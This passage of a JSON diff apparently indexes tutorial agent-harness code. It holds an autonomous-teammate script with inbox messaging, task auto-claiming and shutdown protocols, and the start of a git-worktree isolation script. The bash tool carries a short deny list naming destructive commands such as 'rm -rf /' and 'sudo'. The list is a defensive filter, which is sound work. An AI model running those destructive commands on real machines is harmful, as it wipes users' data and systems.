\"[ ]\", \"in_progress\": \"[>]\", \"completed\": \"[x]\"}.get(t[\"status\"], \"[?]\")\n owner = f\" @{t['owner']}\" if t.get(\"owner\") else \"\"\n print(f\" {marker} #{t['id']}: {t['subject']}{owner}\")\n continue\n history.append({\"role\": \"user\", \"content\": query})\n agent_loop(history)\n response_content = history[-1][\"content\"]\n if isinstance(response_content, list):\n for block in response_content:\n if hasattr(block, \"text\"):\n print(block.text)\n print()\n" + "source": "#!/usr/bin/env python3\n# Harness: autonomy -- models that find work without being told.\n\"\"\"\ns11_autonomous_agents.py - Autonomous Agents\n\nIdle cycle with task board polling, auto-claiming unclaimed tasks, and\nidentity re-injection after context compression. Builds on s10's protocols.\n\n Teammate lifecycle:\n +-------+\n | spawn |\n +---+---+\n |\n v\n +-------+ tool_use +-------+\n | WORK | <----------- | LLM |\n +---+---+ +-------+\n |\n | stop_reason != tool_use\n v\n +--------+\n | IDLE | poll every 5s for up to 60s\n +---+----+\n |\n +---> check inbox -> message? -> resume WORK\n |\n +---> scan .tasks/ -> unclaimed? -> claim -> resume WORK\n |\n +---> timeout (60s) -> shutdown\n\n Identity re-injection after compression:\n messages = [identity_block, ...remaining...]\n \"You are 'coder', role: backend, team: my-team\"\n\nKey insight: \"The agent finds work itself.\"\n\"\"\"\n\nimport json\nimport os\nimport subprocess\nimport threading\nimport time\nimport uuid\nfrom pathlib import Path\n\nfrom anthropic import Anthropic\nfrom dotenv import load_dotenv\n\nload_dotenv(override=True)\nif os.getenv(\"ANTHROPIC_BASE_URL\"):\n os.environ.pop(\"ANTHROPIC_AUTH_TOKEN\", None)\n\nWORKDIR = Path.cwd()\nclient = Anthropic(base_url=os.getenv(\"ANTHROPIC_BASE_URL\"))\nMODEL = os.environ[\"MODEL_ID\"]\nTEAM_DIR = WORKDIR / \".team\"\nINBOX_DIR = TEAM_DIR / \"inbox\"\nTASKS_DIR = WORKDIR / \".tasks\"\n\nPOLL_INTERVAL = 5\nIDLE_TIMEOUT = 60\n\nSYSTEM = f\"You are a team lead at {WORKDIR}. Teammates are autonomous -- they find work themselves.\"\n\nVALID_MSG_TYPES = {\n \"message\",\n \"broadcast\",\n \"shutdown_request\",\n \"shutdown_response\",\n \"plan_approval_response\",\n}\n\n# -- Request trackers --\nshutdown_requests = {}\nplan_requests = {}\n_tracker_lock = threading.Lock()\n_claim_lock = threading.Lock()\n\n\n# -- MessageBus: JSONL inbox per teammate --\nclass MessageBus:\n def __init__(self, inbox_dir: Path):\n self.dir = inbox_dir\n self.dir.mkdir(parents=True, exist_ok=True)\n\n def send(self, sender: str, to: str, content: str,\n msg_type: str = \"message\", extra: dict = None) -> str:\n if msg_type not in VALID_MSG_TYPES:\n return f\"Error: Invalid type '{msg_type}'. Valid: {VALID_MSG_TYPES}\"\n msg = {\n \"type\": msg_type,\n \"from\": sender,\n \"content\": content,\n \"timestamp\": time.time(),\n }\n if extra:\n msg.update(extra)\n inbox_path = self.dir / f\"{to}.jsonl\"\n with open(inbox_path, \"a\") as f:\n f.write(json.dumps(msg) + \"\\n\")\n return f\"Sent {msg_type} to {to}\"\n\n def read_inbox(self, name: str) -> list:\n inbox_path = self.dir / f\"{name}.jsonl\"\n if not inbox_path.exists():\n return []\n messages = []\n for line in inbox_path.read_text().strip().splitlines():\n if line:\n messages.append(json.loads(line))\n inbox_path.write_text(\"\")\n return messages\n\n def broadcast(self, sender: str, content: str, teammates: list) -> str:\n count = 0\n for name in teammates:\n if name != sender:\n self.send(sender, name, content, \"broadcast\")\n count += 1\n return f\"Broadcast to {count} teammates\"\n\n\nBUS = MessageBus(INBOX_DIR)\n\n\n# -- Task board scanning --\ndef scan_unclaimed_tasks() -> list:\n TASKS_DIR.mkdir(exist_ok=True)\n unclaimed = []\n for f in sorted(TASKS_DIR.glob(\"task_*.json\")):\n task = json.loads(f.read_text())\n if (task.get(\"status\") == \"pending\"\n and not task.get(\"owner\")\n and not task.get(\"blockedBy\")):\n unclaimed.append(task)\n return unclaimed\n\n\ndef claim_task(task_id: int, owner: str) -> str:\n with _claim_lock:\n path = TASKS_DIR / f\"task_{task_id}.json\"\n if not path.exists():\n return f\"Error: Task {task_id} not found\"\n task = json.loads(path.read_text())\n if task.get(\"owner\"):\n existing_owner = task.get(\"owner\") or \"someone else\"\n return f\"Error: Task {task_id} has already been claimed by {existing_owner}\"\n if task.get(\"status\") != \"pending\":\n status = task.get(\"status\")\n return f\"Error: Task {task_id} cannot be claimed because its status is '{status}'\"\n if task.get(\"blockedBy\"):\n return f\"Error: Task {task_id} is blocked by other task(s) and cannot be claimed yet\"\n task[\"owner\"] = owner\n task[\"status\"] = \"in_progress\"\n path.write_text(json.dumps(task, indent=2))\n return f\"Claimed task #{task_id} for {owner}\"\n\n\n# -- Identity re-injection after compression --\ndef make_identity_block(name: str, role: str, team_name: str) -> dict:\n return {\n \"role\": \"user\",\n \"content\": f\"You are '{name}', role: {role}, team: {team_name}. Continue your work.\",\n }\n\n\n# -- Autonomous TeammateManager --\nclass TeammateManager:\n def __init__(self, team_dir: Path):\n self.dir = team_dir\n self.dir.mkdir(exist_ok=True)\n self.config_path = self.dir / \"config.json\"\n self.config = self._load_config()\n self.threads = {}\n\n def _load_config(self) -> dict:\n if self.config_path.exists():\n return json.loads(self.config_path.read_text())\n return {\"team_name\": \"default\", \"members\": []}\n\n def _save_config(self):\n self.config_path.write_text(json.dumps(self.config, indent=2))\n\n def _find_member(self, name: str) -> dict:\n for m in self.config[\"members\"]:\n if m[\"name\"] == name:\n return m\n return None\n\n def _set_status(self, name: str, status: str):\n member = self._find_member(name)\n if member:\n member[\"status\"] = status\n self._save_config()\n\n def spawn(self, name: str, role: str, prompt: str) -> str:\n member = self._find_member(name)\n if member:\n if member[\"status\"] not in (\"idle\", \"shutdown\"):\n return f\"Error: '{name}' is currently {member['status']}\"\n member[\"status\"] = \"working\"\n member[\"role\"] = role\n else:\n member = {\"name\": name, \"role\": role, \"status\": \"working\"}\n self.config[\"members\"].append(member)\n self._save_config()\n thread = threading.Thread(\n target=self._loop,\n args=(name, role, prompt),\n daemon=True,\n )\n self.threads[name] = thread\n thread.start()\n return f\"Spawned '{name}' (role: {role})\"\n\n def _loop(self, name: str, role: str, prompt: str):\n team_name = self.config[\"team_name\"]\n sys_prompt = (\n f\"You are '{name}', role: {role}, team: {team_name}, at {WORKDIR}. \"\n f\"Use idle tool when you have no more work. You will auto-claim new tasks.\"\n )\n messages = [{\"role\": \"user\", \"content\": prompt}]\n tools = self._teammate_tools()\n\n while True:\n # -- WORK PHASE: standard agent loop --\n for _ in range(50):\n inbox = BUS.read_inbox(name)\n for msg in inbox:\n if msg.get(\"type\") == \"shutdown_request\":\n self._set_status(name, \"shutdown\")\n return\n messages.append({\"role\": \"user\", \"content\": json.dumps(msg)})\n try:\n response = client.messages.create(\n model=MODEL,\n system=sys_prompt,\n messages=messages,\n tools=tools,\n max_tokens=8000,\n )\n except Exception:\n self._set_status(name, \"idle\")\n return\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n break\n results = []\n idle_requested = False\n for block in response.content:\n if block.type == \"tool_use\":\n if block.name == \"idle\":\n idle_requested = True\n output = \"Entering idle phase. Will poll for new tasks.\"\n else:\n output = self._exec(name, block.name, block.input)\n print(f\" [{name}] {block.name}: {str(output)[:120]}\")\n results.append({\n \"type\": \"tool_result\",\n \"tool_use_id\": block.id,\n \"content\": str(output),\n })\n messages.append({\"role\": \"user\", \"content\": results})\n if idle_requested:\n break\n\n # -- IDLE PHASE: poll for inbox messages and unclaimed tasks --\n self._set_status(name, \"idle\")\n resume = False\n polls = IDLE_TIMEOUT // max(POLL_INTERVAL, 1)\n for _ in range(polls):\n time.sleep(POLL_INTERVAL)\n inbox = BUS.read_inbox(name)\n if inbox:\n for msg in inbox:\n if msg.get(\"type\") == \"shutdown_request\":\n self._set_status(name, \"shutdown\")\n return\n messages.append({\"role\": \"user\", \"content\": json.dumps(msg)})\n resume = True\n break\n unclaimed = scan_unclaimed_tasks()\n if unclaimed:\n task = unclaimed[0]\n result = claim_task(task[\"id\"], name)\n if result.startswith(\"Error:\"):\n continue\n task_prompt = (\n f\"Task #{task['id']}: {task['subject']}\\n\"\n f\"{task.get('description', '')}\"\n )\n if len(messages) <= 3:\n messages.insert(0, make_identity_block(name, role, team_name))\n messages.insert(1, {\"role\": \"assistant\", \"content\": f\"I am {name}. Continuing.\"})\n messages.append({\"role\": \"user\", \"content\": task_prompt})\n messages.append({\"role\": \"assistant\", \"content\": f\"Claimed task #{task['id']}. Working on it.\"})\n resume = True\n break\n\n if not resume:\n self._set_status(name, \"shutdown\")\n return\n self._set_status(name, \"working\")\n\n def _exec(self, sender: str, tool_name: str, args: dict) -> str:\n # these base tools are unchanged from s02\n if tool_name == \"bash\":\n return _run_bash(args[\"command\"])\n if tool_name == \"read_file\":\n return _run_read(args[\"path\"])\n if tool_name == \"write_file\":\n return _run_write(args[\"path\"], args[\"content\"])\n if tool_name == \"edit_file\":\n return _run_edit(args[\"path\"], args[\"old_text\"], args[\"new_text\"])\n if tool_name == \"send_message\":\n return BUS.send(sender, args[\"to\"], args[\"content\"], args.get(\"msg_type\", \"message\"))\n if tool_name == \"read_inbox\":\n return json.dumps(BUS.read_inbox(sender), indent=2)\n if tool_name == \"shutdown_response\":\n req_id = args[\"request_id\"]\n with _tracker_lock:\n if req_id in shutdown_requests:\n shutdown_requests[req_id][\"status\"] = \"approved\" if args[\"approve\"] else \"rejected\"\n BUS.send(\n sender, \"lead\", args.get(\"reason\", \"\"),\n \"shutdown_response\", {\"request_id\": req_id, \"approve\": args[\"approve\"]},\n )\n return f\"Shutdown {'approved' if args['approve'] else 'rejected'}\"\n if tool_name == \"plan_approval\":\n plan_text = args.get(\"plan\", \"\")\n req_id = str(uuid.uuid4())[:8]\n with _tracker_lock:\n plan_requests[req_id] = {\"from\": sender, \"plan\": plan_text, \"status\": \"pending\"}\n BUS.send(\n sender, \"lead\", plan_text, \"plan_approval_response\",\n {\"request_id\": req_id, \"plan\": plan_text},\n )\n return f\"Plan submitted (request_id={req_id}). Waiting for approval.\"\n if tool_name == \"claim_task\":\n return claim_task(args[\"task_id\"], sender)\n return f\"Unknown tool: {tool_name}\"\n\n def _teammate_tools(self) -> list:\n # these base tools are unchanged from s02\n return [\n {\"name\": \"bash\", \"description\": \"Run a shell command.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"command\": {\"type\": \"string\"}}, \"required\": [\"command\"]}},\n {\"name\": \"read_file\", \"description\": \"Read file contents.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}}, \"required\": [\"path\"]}},\n {\"name\": \"write_file\", \"description\": \"Write content to file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}}, \"required\": [\"path\", \"content\"]}},\n {\"name\": \"edit_file\", \"description\": \"Replace exact text in file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"old_text\": {\"type\": \"string\"}, \"new_text\": {\"type\": \"string\"}}, \"required\": [\"path\", \"old_text\", \"new_text\"]}},\n {\"name\": \"send_message\", \"description\": \"Send message to a teammate.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"to\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}, \"msg_type\": {\"type\": \"string\", \"enum\": list(VALID_MSG_TYPES)}}, \"required\": [\"to\", \"content\"]}},\n {\"name\": \"read_inbox\", \"description\": \"Read and drain your inbox.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {}}},\n {\"name\": \"shutdown_response\", \"description\": \"Respond to a shutdown request.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"request_id\": {\"type\": \"string\"}, \"approve\": {\"type\": \"boolean\"}, \"reason\": {\"type\": \"string\"}}, \"required\": [\"request_id\", \"approve\"]}},\n {\"name\": \"plan_approval\", \"description\": \"Submit a plan for lead approval.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"plan\": {\"type\": \"string\"}}, \"required\": [\"plan\"]}},\n {\"name\": \"idle\", \"description\": \"Signal that you have no more work. Enters idle polling phase.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {}}},\n {\"name\": \"claim_task\", \"description\": \"Claim a task from the task board by ID.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"task_id\": {\"type\": \"integer\"}}, \"required\": [\"task_id\"]}},\n ]\n\n def list_all(self) -> str:\n if not self.config[\"members\"]:\n return \"No teammates.\"\n lines = [f\"Team: {self.config['team_name']}\"]\n for m in self.config[\"members\"]:\n lines.append(f\" {m['name']} ({m['role']}): {m['status']}\")\n return \"\\n\".join(lines)\n\n def member_names(self) -> list:\n return [m[\"name\"] for m in self.config[\"members\"]]\n\n\nTEAM = TeammateManager(TEAM_DIR)\n\n\n# -- Base tool implementations (these base tools are unchanged from s02) --\ndef _safe_path(p: str) -> Path:\n path = (WORKDIR / p).resolve()\n if not path.is_relative_to(WORKDIR):\n raise ValueError(f\"Path escapes workspace: {p}\")\n return path\n\n\ndef _run_bash(command: str) -> str:\n dangerous = [\"rm -rf /\", \"sudo\", \"shutdown\", \"reboot\"]\n if any(d in command for d in dangerous):\n return \"Error: Dangerous command blocked\"\n try:\n r = subprocess.run(\n command, shell=True, cwd=WORKDIR,\n capture_output=True, text=True, timeout=120,\n )\n out = (r.stdout + r.stderr).strip()\n return out[:50000] if out else \"(no output)\"\n except subprocess.TimeoutExpired:\n return \"Error: Timeout (120s)\"\n\n\ndef _run_read(path: str, limit: int = None) -> str:\n try:\n lines = _safe_path(path).read_text().splitlines()\n if limit and limit < len(lines):\n lines = lines[:limit] + [f\"... ({len(lines) - limit} more)\"]\n return \"\\n\".join(lines)[:50000]\n except Exception as e:\n return f\"Error: {e}\"\n\n\ndef _run_write(path: str, content: str) -> str:\n try:\n fp = _safe_path(path)\n fp.parent.mkdir(parents=True, exist_ok=True)\n fp.write_text(content)\n return f\"Wrote {len(content)} bytes\"\n except Exception as e:\n return f\"Error: {e}\"\n\n\ndef _run_edit(path: str, old_text: str, new_text: str) -> str:\n try:\n fp = _safe_path(path)\n c = fp.read_text()\n if old_text not in c:\n return f\"Error: Text not found in {path}\"\n fp.write_text(c.replace(old_text, new_text, 1))\n return f\"Edited {path}\"\n except Exception as e:\n return f\"Error: {e}\"\n\n\n# -- Lead-specific protocol handlers --\ndef handle_shutdown_request(teammate: str) -> str:\n req_id = str(uuid.uuid4())[:8]\n with _tracker_lock:\n shutdown_requests[req_id] = {\"target\": teammate, \"status\": \"pending\"}\n BUS.send(\n \"lead\", teammate, \"Please shut down gracefully.\",\n \"shutdown_request\", {\"request_id\": req_id},\n )\n return f\"Shutdown request {req_id} sent to '{teammate}'\"\n\n\ndef handle_plan_review(request_id: str, approve: bool, feedback: str = \"\") -> str:\n with _tracker_lock:\n req = plan_requests.get(request_id)\n if not req:\n return f\"Error: Unknown plan request_id '{request_id}'\"\n with _tracker_lock:\n req[\"status\"] = \"approved\" if approve else \"rejected\"\n BUS.send(\n \"lead\", req[\"from\"], feedback, \"plan_approval_response\",\n {\"request_id\": request_id, \"approve\": approve, \"feedback\": feedback},\n )\n return f\"Plan {req['status']} for '{req['from']}'\"\n\n\ndef _check_shutdown_status(request_id: str) -> str:\n with _tracker_lock:\n return json.dumps(shutdown_requests.get(request_id, {\"error\": \"not found\"}))\n\n\n# -- Lead tool dispatch (14 tools) --\nTOOL_HANDLERS = {\n \"bash\": lambda **kw: _run_bash(kw[\"command\"]),\n \"read_file\": lambda **kw: _run_read(kw[\"path\"], kw.get(\"limit\")),\n \"write_file\": lambda **kw: _run_write(kw[\"path\"], kw[\"content\"]),\n \"edit_file\": lambda **kw: _run_edit(kw[\"path\"], kw[\"old_text\"], kw[\"new_text\"]),\n \"spawn_teammate\": lambda **kw: TEAM.spawn(kw[\"name\"], kw[\"role\"], kw[\"prompt\"]),\n \"list_teammates\": lambda **kw: TEAM.list_all(),\n \"send_message\": lambda **kw: BUS.send(\"lead\", kw[\"to\"], kw[\"content\"], kw.get(\"msg_type\", \"message\")),\n \"read_inbox\": lambda **kw: json.dumps(BUS.read_inbox(\"lead\"), indent=2),\n \"broadcast\": lambda **kw: BUS.broadcast(\"lead\", kw[\"content\"], TEAM.member_names()),\n \"shutdown_request\": lambda **kw: handle_shutdown_request(kw[\"teammate\"]),\n \"shutdown_response\": lambda **kw: _check_shutdown_status(kw.get(\"request_id\", \"\")),\n \"plan_approval\": lambda **kw: handle_plan_review(kw[\"request_id\"], kw[\"approve\"], kw.get(\"feedback\", \"\")),\n \"idle\": lambda **kw: \"Lead does not idle.\",\n \"claim_task\": lambda **kw: claim_task(kw[\"task_id\"], \"lead\"),\n}\n\n# these base tools are unchanged from s02\nTOOLS = [\n {\"name\": \"bash\", \"description\": \"Run a shell command.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"command\": {\"type\": \"string\"}}, \"required\": [\"command\"]}},\n {\"name\": \"read_file\", \"description\": \"Read file contents.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"limit\": {\"type\": \"integer\"}}, \"required\": [\"path\"]}},\n {\"name\": \"write_file\", \"description\": \"Write content to file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}}, \"required\": [\"path\", \"content\"]}},\n {\"name\": \"edit_file\", \"description\": \"Replace exact text in file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"old_text\": {\"type\": \"string\"}, \"new_text\": {\"type\": \"string\"}}, \"required\": [\"path\", \"old_text\", \"new_text\"]}},\n {\"name\": \"spawn_teammate\", \"description\": \"Spawn an autonomous teammate.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"name\": {\"type\": \"string\"}, \"role\": {\"type\": \"string\"}, \"prompt\": {\"type\": \"string\"}}, \"required\": [\"name\", \"role\", \"prompt\"]}},\n {\"name\": \"list_teammates\", \"description\": \"List all teammates.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {}}},\n {\"name\": \"send_message\", \"description\": \"Send a message to a teammate.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"to\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}, \"msg_type\": {\"type\": \"string\", \"enum\": list(VALID_MSG_TYPES)}}, \"required\": [\"to\", \"content\"]}},\n {\"name\": \"read_inbox\", \"description\": \"Read and drain the lead's inbox.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {}}},\n {\"name\": \"broadcast\", \"description\": \"Send a message to all teammates.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"content\": {\"type\": \"string\"}}, \"required\": [\"content\"]}},\n {\"name\": \"shutdown_request\", \"description\": \"Request a teammate to shut down.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"teammate\": {\"type\": \"string\"}}, \"required\": [\"teammate\"]}},\n {\"name\": \"shutdown_response\", \"description\": \"Check shutdown request status.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"request_id\": {\"type\": \"string\"}}, \"required\": [\"request_id\"]}},\n {\"name\": \"plan_approval\", \"description\": \"Approve or reject a teammate's plan.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"request_id\": {\"type\": \"string\"}, \"approve\": {\"type\": \"boolean\"}, \"feedback\": {\"type\": \"string\"}}, \"required\": [\"request_id\", \"approve\"]}},\n {\"name\": \"idle\", \"description\": \"Enter idle state (for lead -- rarely used).\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {}}},\n {\"name\": \"claim_task\", \"description\": \"Claim a task from the board by ID.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"task_id\": {\"type\": \"integer\"}}, \"required\": [\"task_id\"]}},\n]\n\n\ndef agent_loop(messages: list):\n while True:\n inbox = BUS.read_inbox(\"lead\")\n if inbox:\n messages.append({\n \"role\": \"user\",\n \"content\": f\"{json.dumps(inbox, indent=2)}\",\n })\n response = client.messages.create(\n model=MODEL,\n system=SYSTEM,\n messages=messages,\n tools=TOOLS,\n max_tokens=8000,\n )\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n return\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n handler = TOOL_HANDLERS.get(block.name)\n try:\n output = handler(**block.input) if handler else f\"Unknown tool: {block.name}\"\n except Exception as e:\n output = f\"Error: {e}\"\n print(f\"> {block.name}:\")\n print(str(output)[:200])\n results.append({\n \"type\": \"tool_result\",\n \"tool_use_id\": block.id,\n \"content\": str(output),\n })\n messages.append({\"role\": \"user\", \"content\": results})\n\n\nif __name__ == \"__main__\":\n history = []\n while True:\n try:\n query = input(\"\\033[36ms11 >> \\033[0m\")\n except (EOFError, KeyboardInterrupt):\n break\n if query.strip().lower() in (\"q\", \"exit\", \"\"):\n break\n if query.strip() == \"/team\":\n print(TEAM.list_all())\n continue\n if query.strip() == \"/inbox\":\n print(json.dumps(BUS.read_inbox(\"lead\"), indent=2))\n continue\n if query.strip() == \"/tasks\":\n TASKS_DIR.mkdir(exist_ok=True)\n for f in sorted(TASKS_DIR.glob(\"task_*.json\")):\n t = json.loads(f.read_text())\n marker = {\"pending\": \"[ ]\", \"in_progress\": \"[>]\", \"completed\": \"[x]\"}.get(t[\"status\"], \"[?]\")\n owner = f\" @{t['owner']}\" if t.get(\"owner\") else \"\"\n print(f\" {marker} #{t['id']}: {t['subject']}{owner}\")\n continue\n history.append({\"role\": \"user\", \"content\": query})\n agent_loop(history)\n response_content = history[-1][\"content\"]\n if isinstance(response_content, list):\n for block in response_content:\n if hasattr(block, \"text\"):\n print(block.text)\n print()\n" }, { "id": "s12", "filename": "s12_worktree_task_isolation.py", "title": "Worktree + Task Isolation", "subtitle": "Isolate by Directory", - "loc": 694, + "loc": 695, "tools": [ "bash", "read_file", @@ -773,59 +773,279 @@ "classes": [ { "name": "EventBus", - "startLine": 82, - "endLine": 120 + "startLine": 83, + "endLine": 121 }, { "name": "TaskManager", - "startLine": 121, - "endLine": 218 + "startLine": 122, + "endLine": 219 }, { "name": "WorktreeManager", - "startLine": 224, - "endLine": 472 + "startLine": 225, + "endLine": 473 } ], "functions": [ { "name": "detect_repo_root", "signature": "def detect_repo_root(cwd: Path)", - "startLine": 52 + "startLine": 53 }, { "name": "safe_path", "signature": "def safe_path(p: str)", - "startLine": 477 + "startLine": 478 }, { "name": "run_bash", "signature": "def run_bash(command: str)", - "startLine": 484 + "startLine": 485 }, { "name": "run_read", "signature": "def run_read(path: str, limit: int = None)", - "startLine": 503 + "startLine": 504 }, { "name": "run_write", "signature": "def run_write(path: str, content: str)", - "startLine": 513 + "startLine": 514 }, { "name": "run_edit", "signature": "def run_edit(path: str, old_text: str, new_text: str)", - "startLine": 523 + "startLine": 524 }, { "name": "agent_loop", "signature": "def agent_loop(messages: list)", - "startLine": 728 + "startLine": 729 } ], "layer": "collaboration", - "source": "#!/usr/bin/env python3\n\"\"\"\ns12_worktree_task_isolation.py - Worktree + Task Isolation\n\nDirectory-level isolation for parallel task execution.\nTasks are the control plane and worktrees are the execution plane.\n\n .tasks/task_12.json\n {\n \"id\": 12,\n \"subject\": \"Implement auth refactor\",\n \"status\": \"in_progress\",\n \"worktree\": \"auth-refactor\"\n }\n\n .worktrees/index.json\n {\n \"worktrees\": [\n {\n \"name\": \"auth-refactor\",\n \"path\": \".../.worktrees/auth-refactor\",\n \"branch\": \"wt/auth-refactor\",\n \"task_id\": 12,\n \"status\": \"active\"\n }\n ]\n }\n\nKey insight: \"Isolate by directory, coordinate by task ID.\"\n\"\"\"\n\nimport json\nimport os\nimport re\nimport subprocess\nimport time\nfrom pathlib import Path\n\nfrom anthropic import Anthropic\nfrom dotenv import load_dotenv\n\nload_dotenv(override=True)\n\nif os.getenv(\"ANTHROPIC_BASE_URL\"):\n os.environ.pop(\"ANTHROPIC_AUTH_TOKEN\", None)\n\nWORKDIR = Path.cwd()\nclient = Anthropic(base_url=os.getenv(\"ANTHROPIC_BASE_URL\"))\nMODEL = os.environ[\"MODEL_ID\"]\n\n\ndef detect_repo_root(cwd: Path) -> Path | None:\n \"\"\"Return git repo root if cwd is inside a repo, else None.\"\"\"\n try:\n r = subprocess.run(\n [\"git\", \"rev-parse\", \"--show-toplevel\"],\n cwd=cwd,\n capture_output=True,\n text=True,\n timeout=10,\n )\n if r.returncode != 0:\n return None\n root = Path(r.stdout.strip())\n return root if root.exists() else None\n except Exception:\n return None\n\n\nREPO_ROOT = detect_repo_root(WORKDIR) or WORKDIR\n\nSYSTEM = (\n f\"You are a coding agent at {WORKDIR}. \"\n \"Use task + worktree tools for multi-task work. \"\n \"For parallel or risky changes: create tasks, allocate worktree lanes, \"\n \"run commands in those lanes, then choose keep/remove for closeout. \"\n \"Use worktree_events when you need lifecycle visibility.\"\n)\n\n\n# -- EventBus: append-only lifecycle events for observability --\nclass EventBus:\n def __init__(self, event_log_path: Path):\n self.path = event_log_path\n self.path.parent.mkdir(parents=True, exist_ok=True)\n if not self.path.exists():\n self.path.write_text(\"\")\n\n def emit(\n self,\n event: str,\n task: dict | None = None,\n worktree: dict | None = None,\n error: str | None = None,\n ):\n payload = {\n \"event\": event,\n \"ts\": time.time(),\n \"task\": task or {},\n \"worktree\": worktree or {},\n }\n if error:\n payload[\"error\"] = error\n with self.path.open(\"a\", encoding=\"utf-8\") as f:\n f.write(json.dumps(payload) + \"\\n\")\n\n def list_recent(self, limit: int = 20) -> str:\n n = max(1, min(int(limit or 20), 200))\n lines = self.path.read_text(encoding=\"utf-8\").splitlines()\n recent = lines[-n:]\n items = []\n for line in recent:\n try:\n items.append(json.loads(line))\n except Exception:\n items.append({\"event\": \"parse_error\", \"raw\": line})\n return json.dumps(items, indent=2)\n\n\n# -- TaskManager: persistent task board with optional worktree binding --\nclass TaskManager:\n def __init__(self, tasks_dir: Path):\n self.dir = tasks_dir\n self.dir.mkdir(parents=True, exist_ok=True)\n self._next_id = self._max_id() + 1\n\n def _max_id(self) -> int:\n ids = []\n for f in self.dir.glob(\"task_*.json\"):\n try:\n ids.append(int(f.stem.split(\"_\")[1]))\n except Exception:\n pass\n return max(ids) if ids else 0\n\n def _path(self, task_id: int) -> Path:\n return self.dir / f\"task_{task_id}.json\"\n\n def _load(self, task_id: int) -> dict:\n path = self._path(task_id)\n if not path.exists():\n raise ValueError(f\"Task {task_id} not found\")\n return json.loads(path.read_text())\n\n def _save(self, task: dict):\n self._path(task[\"id\"]).write_text(json.dumps(task, indent=2))\n\n def create(self, subject: str, description: str = \"\") -> str:\n task = {\n \"id\": self._next_id,\n \"subject\": subject,\n \"description\": description,\n \"status\": \"pending\",\n \"owner\": \"\",\n \"worktree\": \"\",\n \"blockedBy\": [],\n \"created_at\": time.time(),\n \"updated_at\": time.time(),\n }\n self._save(task)\n self._next_id += 1\n return json.dumps(task, indent=2)\n\n def get(self, task_id: int) -> str:\n return json.dumps(self._load(task_id), indent=2)\n\n def exists(self, task_id: int) -> bool:\n return self._path(task_id).exists()\n\n def update(self, task_id: int, status: str = None, owner: str = None) -> str:\n task = self._load(task_id)\n if status:\n if status not in (\"pending\", \"in_progress\", \"completed\"):\n raise ValueError(f\"Invalid status: {status}\")\n task[\"status\"] = status\n if owner is not None:\n task[\"owner\"] = owner\n task[\"updated_at\"] = time.time()\n self._save(task)\n return json.dumps(task, indent=2)\n\n def bind_worktree(self, task_id: int, worktree: str, owner: str = \"\") -> str:\n task = self._load(task_id)\n task[\"worktree\"] = worktree\n if owner:\n task[\"owner\"] = owner\n if task[\"status\"] == \"pending\":\n task[\"status\"] = \"in_progress\"\n task[\"updated_at\"] = time.time()\n self._save(task)\n return json.dumps(task, indent=2)\n\n def unbind_worktree(self, task_id: int) -> str:\n task = self._load(task_id)\n task[\"worktree\"] = \"\"\n task[\"updated_at\"] = time.time()\n self._save(task)\n return json.dumps(task, indent=2)\n\n def list_all(self) -> str:\n tasks = []\n for f in sorted(self.dir.glob(\"task_*.json\")):\n tasks.append(json.loads(f.read_text()))\n if not tasks:\n return \"No tasks.\"\n lines = []\n for t in tasks:\n marker = {\n \"pending\": \"[ ]\",\n \"in_progress\": \"[>]\",\n \"completed\": \"[x]\",\n }.get(t[\"status\"], \"[?]\")\n owner = f\" owner={t['owner']}\" if t.get(\"owner\") else \"\"\n wt = f\" wt={t['worktree']}\" if t.get(\"worktree\") else \"\"\n lines.append(f\"{marker} #{t['id']}: {t['subject']}{owner}{wt}\")\n return \"\\n\".join(lines)\n\n\nTASKS = TaskManager(REPO_ROOT / \".tasks\")\nEVENTS = EventBus(REPO_ROOT / \".worktrees\" / \"events.jsonl\")\n\n\n# -- WorktreeManager: create/list/run/remove git worktrees + lifecycle index --\nclass WorktreeManager:\n def __init__(self, repo_root: Path, tasks: TaskManager, events: EventBus):\n self.repo_root = repo_root\n self.tasks = tasks\n self.events = events\n self.dir = repo_root / \".worktrees\"\n self.dir.mkdir(parents=True, exist_ok=True)\n self.index_path = self.dir / \"index.json\"\n if not self.index_path.exists():\n self.index_path.write_text(json.dumps({\"worktrees\": []}, indent=2))\n self.git_available = self._is_git_repo()\n\n def _is_git_repo(self) -> bool:\n try:\n r = subprocess.run(\n [\"git\", \"rev-parse\", \"--is-inside-work-tree\"],\n cwd=self.repo_root,\n capture_output=True,\n text=True,\n timeout=10,\n )\n return r.returncode == 0\n except Exception:\n return False\n\n def _run_git(self, args: list[str]) -> str:\n if not self.git_available:\n raise RuntimeError(\"Not in a git repository. worktree tools require git.\")\n r = subprocess.run(\n [\"git\", *args],\n 